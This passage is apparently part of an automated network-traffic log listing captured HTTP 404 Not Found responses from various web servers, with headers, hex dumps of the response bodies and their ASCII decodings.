2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 7d 0a 20 20 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:10 GMTServer: Apache/2.4.18 (Ubuntu)Content-Length: 278Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 63 68 6f 6e 6f 6e 6c 69 6e 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at archononline.com Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 20 Feb 2024 23:26:10 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Founddate: Tue, 20 Feb 2024 23:26:10 GMTcontent-type: text/html; charset=iso-8859-1content-length: 196server: Apachex-iplb-request-id: BF60E3DE:E1C2_D5BA2104:0050_65D53512_D449:19A2x-iplb-instance: 51886Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:10 GMTServer: Apache/2.4.58 (Unix)Content-Length: 196Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveKeep-Alive: timeout=15Date: Tue, 20 Feb 2024 23:26:09 GMTServer: ApacheX-Powered-By: PHP/7.3.33Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://www.netzschnipsel.de/wp-json/>; rel="https://api.w.org/"Content-Encoding: gzipData Raw: 32 35 33 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 7d df 72 db b8 92 f7 75 5c 75 de 01 66 76 23 69 47 a4 44 49 fe 27 5b 9e e3 c4 4e c6 33 71 92 cf 72 36 7b 36 49 b9 28 09 92 18 53 a4 86 a4 2c 3b 99 bc c9 56 ed cd 79 86 bd 9a bb bc d8 fe 1a 00 ff 49 b4 4c 39 39 5f 6d 6d 6d 52 b6 25 12 40 37 1a dd 8d 46 77 03 38 d8 3c 7e fd ec e2 6f 6f 4e d8 38 9c 38 87 1b 07 f4 87 f5 1d 2b 08 3a 9a eb e9 9f 02 8d 39 96 3b ea 68 03 ae 1f 9f 68 ec 66 e2 b8 41 7b d8 eb 68 e3 30 9c b6 6b 35 6f 34 35 26 bc e6 06 b5 61 ef 71 f4 de 1a 0c c2 b1 8d 26 54 a1 f9 7c 6e a8 67 46 df 9b d4 c6 dc 99 d6 ac a9 ad 07 53 de d7 18 c1 e5 d6 e0 70 83 b1 83 09 0f 2d d6 1f 5b 7e c0 c3 8e f6 f6 e2 b9 be ab 25 2f 5c 6b c2 3b da b5 cd e7 53 cf 0f 35 d6 f7 dc 90 bb 28 38 b7 01 b1 33 e0 d7 76 9f eb e2 4b 95 d9 ae 1d da 96 a3 07 7d cb e1 1d d3 a8 cb 86 1c db bd 62 3e 77 3a da d4 f7 86 b6 c3 35 36 f6 f9 30 46 76 34 99 8e 0c cf 1f d5 6e 86 6e cd 34 97 2a d9 ee a8 67 f5 af 16 6a 51 17 5d 1e 7e 0e fa 63 d7 9e 06 dc 31 06 bc 06 6a f9 d3 be 31 1d 4f d1 0a f5 2e b4 43 87 1f 76 b9 1d 72 e6 da fd 71 c8 46 7c 38 73 07 dc 65 4f 1e ef 36 4c 73 9f bd 4a 37 c2 06 dc 67 5d af 8f 6e b0 33 3e b0 2d f6 d4 f1 46 07 35 d9 ce c6 41 d0 f7 ed 69 78 38 f0 fa b3 09 e8 60 44 1f 4e 1c 2e be 8b 91 7c 05 a2 b1 0e 8b de dd 5d c8 f0 f9 d4 b1 fa bc ac 86 be aa 61 fc 2b fb 07 35 05 66 e3 20 a6 5d 69 e0 06 fa 14 64 e3 61 7f 5c 92 04 2c d5 6a 79 54 28 b1 1a 06 f8 be 9a 81 31 27 a2 2f 14 d6 2c 27 e4 be 6b 85 18 a4 f0 76 8a b1 b7 a6 53 c7 ee 5b a1 ed b9 35 3f 08 7e 02 89 f1 8a c8 da d1 0a 90 8e 3d f1 ad df 67 de 3e 7b ce f9 a0 c8 10 0e 51 ae a6 65 bb f0 8f c3 ea 37 6f 42 e3 66 f9 7a 51 fc 20 4e 54 03 e2 17 23 fa e8 91 e2 0b 45 b2 90 df 84 b5 4f d6 b5 25 87 11 ac f8 e8 d1 a3 b9 ed 0e bc b9 71 39 9f f2 89 f7 c9 ee f2 30 04 63 07 e0 93 2f 5a cf 0a f8 5b df d1 da 42 7e 83 f6 87 da 87 9a 1a 9f 0f 35 7b 62 8d 78 f0 a1 d6 f7 7c fe a1 26 2a 7f a8 35 8c 86 61 7e a8 ed 34 6e 76 1a 1f 6a 5a 55 03 48 54 37 a6 ee 08 5f 82 eb d1 83 9a 43 3d d1 18 fe 9e c8 f6 f0 89 da f3 66 7e 9f 6b ed 2f 1a e4 1f bc 20 90 50 d8 0a 64 f3 d8 f0 43 6d 3e d5 6d b7 ef cc 06 84 fe 27 fc e0 81 a8 aa 43 1b 70 f4 d9 98 d8 ae f1 29 f8 f9 9a fb 9d 96 b1 63 34 76 b5 af 5f f7 89 5a 9b 10 d2 3e f1 5c 39 ac 5a 55 5e f9 72 6d f9 cc af ba 55 bb ea 75 2c a3 ef 73 60 a1 84 ae ac f5 2d 17 c4 d6 2a 55 a7 e3 19 23 1e 3e 23 2d 75 13 3e 79 92 fe 56 d6 1a 03 08 57 d4 30 eb 97 43 d9 2c 5f 6e 50 0d 5c 65 9f 1b 81 df ef 84 55 0e ed 32 04 96 dc 90 52 b1 38 c4 55 8b e0 2a 84 82 a7 b7 17 d6 88 b4 40 59 23 3d ab 55 de d7 3f 1a 10 24 ee 0e 9e 8d 6d 67 50 e6 95 af 43 cf 2f db 9d 23 df
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: no-cache, must-revalidateContent-Length: 77570Content-Type: text/html; charset=UTF-8Date: Tue, 20 Feb 2024 23:26:10 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: gkSVGJZZ/1jDNvuocData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 3
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:10 GMTServer: nginx/1.21.6Content-Type: text/html; charset=UTF-8Content-Length: 7939Pragma: no-cacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://wilsonfamilyinsurance.com/wp-json/>; rel="https://api.w.org/"Vary: Accept-EncodingContent-Encoding: gziphost-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==X-Endurance-Cache-Level: 2Set-Cookie: PHPSESSID=08970b3d20577a8a4bf2f1bbb4da462b; path=/Data Raw: 1f 8b 08 00 00 00 00 00 00 03 c5 72 6b 73 db b6 d6 f5 e7 78 a6 ff 01 66 a6 b1 d4 0a a4 6e be c9 a6 fb e4 a4 c9 79 72 a6 a7 e9 d3 a4 d3 f7 4c 92 c9 40 e4 26 09 1b 04 58 00 d4 a5 ae ff fb bb 41 5d 2c cb 94 ec c4 4e 8f e2 48 24 b0 f7 5a 6b af bd be d9 f9 66 e7 74 f7 c7 37 2f de fd e7 97 97 24 b3 b9 38 c3 03 f7 4b 04 93 69 e8 81 a4 bf bd f5 aa 43 60 b1 fb cd c1 32 12 65 4c 1b b0 a1 f7 db bb 57 f4 c8 23 c1 f2 26 b3 b6 a0 f0 47 c9 47 a1 f7 ff e8 6f cf e9 0b 95 17 cc f2 a1 00 8f 44 4a 5a 90 d8 f6 fa 65 08 71 0a de b2 4d b2 1c 42 6f c4 61 5c 28 6d 57 2a c7 3c b6 59 18 c3 88 47 40 ab 97 16 e1 92 5b ce 04 35 11 13 10 76 bc 33 f2 0d ce 41 c8 a9 e5 56 c0 d9 2f 2c 05 22 95 25 89 2a 65 4c 9e 3d 3d ea 76 3a 27 e4 77 2e 8c 92 e4 15 cb b9 98 92 d7 d2 94 9a c9 08 4e 83 59 d7 aa 90 3d ad 86 ca 9a bd a5 8c bd 9c 4d 28 cf 11 98 16 1a 9c cc 81 60 3a 85 3d 9c 7c e7 54 70 79 41 34 88 70 2f 96 c6 15 24 60 a3 6c 8f 64 f8 14 ee 05 81 b1 cc 1a 7f 5c f8 91 ca ef d7 91 20 af f1 53 a5 52 01 ac e0 e6 fe 9d a3 b6 3f 56 3a c6 0b f3 19 5d bc 5d 2f cf 63 c2 82 96 cc e2 f2 ec b4 c0 15 b1 a2 10 3c c2 85 2a 19 68 63 be 9f e4 02 af 9c 83 a1 b7 c1 61 f2 4c b3 3f 4a 75 42 5e 01 c4 de 8c d3 73 39 31 83 20 18 57 3d 49 d5 c2 17 1d 4e 49 90 60 75 e0 7d 4d 3d 18 cd 1c b7 6b 3e 53 58 34 6f 5b 51 f8 e4 c9 e9 2e a5 e4 5d c6 0d 31 dc 02 29 0d 18 62 33 20 ff ac 76 48 9e 4b 26 a6 96 47 86 0c a7 e4 df 4a 1a 1c 03 05 f1 34 43 fa 42 94 29 97 64 74 e4 77 fb 7e 9b 50 f2 9b e1 32 5d e9 b1 9a 45 17 ee 88 92 a5 bc f1 d8 cf 67 38 7c 8e 53 89 23 94 2e e5 fc ac 2c 0c 6e b1 a1 44 a9 2c 89 4a ad 71 0a 34 06 43 9e f0 b4 d4 10 13 74 cb 2e 66 f0 71 1c 98 4d a3 c6 12 34 91 38 2e 6a 51 84 95 38 99 b4 ce 76 20 63 6e b3 db 53 72 59 4d bf ce 6d c0 5a 9c 03 47 66 12 84 3f 17 fb 64 a9 f7 7a d2 48 c5 e0 ca 97 25 55 45 70 2f 3f e7 16 98 48 f3 c2 ce 73 62 61 62 83 73 36 62 b3 53 ef 6c 27 f8 8e 9c ee be 7f f1 e3 f3 77 cf df 93 ef 82 9d 31 97 b1 1a fb 9f c6 05 e4 ea 9c bf 5d 48 0d c9 a5 37 64 06 7e d3 c2 1b cc e3 f1 21 f8 10 18 7f ec 2b 9d 7e 08 78 ce 52 30 1f 30 17 1a 3e 04 55 f3 87 a0 83 9b f4 db 1f 82 c3 ee e4 b0 fb 21 f0 5a 1e 0a c0 7e bf 90 29 be 98 51 fa 65 78 d8 58 a1 e1 ef cb 19 20 3e b9 77 55 ea 08 bc c1 a5 87 eb 74 8b 71 6d 73 fc 0a 7e 63 9e f1 aa a0 5c 46 a2 8c 1d eb b9 a9 0e aa 7e aa 41 00 8e ee e7 5c fa e7 e6 87 11 e8 f0 c0 ef fb Data Ascii: rksxfnyrL@&XA],NH$Zkft7/$8KiC`2eLW#&GGo
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:10 GMTServer: Apache/2.4.18 (Ubuntu)Content-Length: 278Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 63 68 6f 6e 6f 6e 6c 69 6e 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at archononline.com Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 20 Feb 2024 23:26:10 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:10 GMTServer: Apache/2.4.18 (Ubuntu)Content-Length: 278Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 63 68 6f 6e 6f 6e 6c 69 6e 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at archononline.com Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:10 GMTServer: ApacheUpgrade: h2,h2cConnection: UpgradeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 30 0d 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 10File not found.0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: no-cache, must-revalidateContent-Length: 77562Content-Type: text/html; charset=UTF-8Date: Tue, 20 Feb 2024 23:26:10 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: jw5xpYID/ZjeADirwData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 3
